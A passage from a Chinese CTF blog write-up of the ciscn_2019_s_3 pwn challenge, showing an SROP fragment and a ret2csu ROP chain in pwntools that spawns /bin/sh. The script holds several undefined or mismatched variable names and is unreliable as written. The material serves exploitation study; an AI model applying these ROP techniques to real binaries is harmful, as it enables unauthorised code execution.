class="hljs-number">0x10</span>-<span class="hljs-built_in">len</span>(<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))+p64(rax)+p64(syscall_ret)+<span class="hljs-built_in">bytes</span>(frame)<br><br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h4 id="方法一-ret2csu："><a href="#方法一-ret2csu：" class="headerlink" title="方法一-ret2csu："></a>方法一-ret2csu：</h4><p>因为程序中有 59 系统调用号，所以想办法控制寄存器的值调用 execve(“&#x2F;bin&#x2F;sh”,0,0)。一共需要传三个参数，因为是 64 位所以需要 rdi , rsi ,和 rdx 三个寄存器用来传参。分别对应：</p>
<figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vbnet"><span class="hljs-symbol">rax:</span> <span class="hljs-number">0</span>x3b<br><span class="hljs-symbol">rdi:</span> <span class="hljs-comment">&#x27;/bin/sh&#x27;</span><br><span class="hljs-symbol">rsi:</span> <span class="hljs-number">0</span><br><span class="hljs-symbol">rdx:</span> <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<p><code>mov rax ,3b</code> 就是之前提到的 vuln 里的可利用的代码片段。其余的可以在 init_csu 函数里找到对应的 gadget。</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_csu.png" srcset="/img/loading.gif" lazyload></p>
<p>我们可以通过下半段的 pop 指令，设置 r13、r14 ，再通过上半部分的 mov 指令将 r13、r14 的值分别赋值给 rdx、rsi。其余的寄存器的值根据需要设置。我们目前需要设置的是 r13&#x3D;0、r14&#x3D;0。</p>
<p>我们当前构想的 payload 结构如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_stack.png" srcset="/img/loading.gif" lazyload></p>
<p>需要注意一下的是，我们执行完毕 mov 命令后，会执行 call 指令，对应跳转到 <code>r12+rbx*8</code> 处。所以我们将 rbx 设置为 0，就可以让这一步执行 r12 处指向的操作。对应的 r12 我们就可以存储我们想要执行的地址 mov_rax_addr。</p>
<p>那 <code>pop_rdi</code> 怎么执行呢？</p>
<p>程序回到 csu 后会自动给 rbx+1 ，随后进行 rbx 与 rbp 的比较，如果比较结果不同就会跳转到mov 指令处再次执行，这时call 会跳转到<code>r12+8</code>，正好就是 <code>pop_rdi</code> 。</p>
<p>综上，我们要给 rbx 和 rbp 都赋值 0，给 r12 复制存储  mov_rax_addr 的地址，同样是利用偏移来确定，就是 ‘&#x2F;bin&#x2F;sh’+0x50 。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>mov_addr=<span class="hljs-number">0x0400580</span><br>pop_add=<span class="hljs-number">0x040059A</span><br>mov_rax=<span class="hljs-number">0x04004E2</span><br>pop_rdi=<span class="hljs-number">0x04005a3</span> <br>syscall_addr=<span class="hljs-number">0x0400501</span><br><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x10</span>-<span class="hljs-built_in">len</span>(<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))+p64(vuln_addr)<br>sh.sendline(payload)<br><br>stack_add=p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>bin_sh=u64(add)-<span class="hljs-number">0x118</span><br><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x10</span>-<span class="hljs-built_in">len</span>(<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))+p64(pop_addr)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+p64(bin_sh+<span class="hljs-number">0x50</span>)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span><br>payload+=p64(mov_addr)+p64(mov_rax)<br>payload+=p64(pop_rdi)+p64(bin_sh)+p64(syscall_addr)<br> <br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure>



<hr>
<p>脑袋笨笨的🥹</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/pwn/" class="category-chain-item">pwn</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">#格式化字符串</a>
      
        <a href="/tags/%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA/">#整数溢出</a>
      
        <a href="/tags/stack/">#stack</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>随机掉落做题复健</div>
      <div>https://shmodifier.github.io/2024/03/17/复健/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Modifier</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/24/%E5%A4%8D%E5%81%A52-0/" title="复健2.0">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">复健2.0</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/05/how2heap%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BA%E5%AD%A6%E4%B9%A0%E5%A0%86%E5%88%A9%E7%94%A8-%E4%BA%8C/" title="how2heap深入浅出学习堆利用(二)">
                        <span class="hidden-mobile">how2heap深入浅出学习堆利用(二)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    
    <div class="footer-content">
       <p> Copyright &copy; 2022&nbsp;-&nbsp;2024 <a href="/">Modifier</a> </p> <p>Powered by <a href="https://hexo.io" target="_blank">Hexo</a> | Theme - <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a></p> <!--  <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> -->

    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  

<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
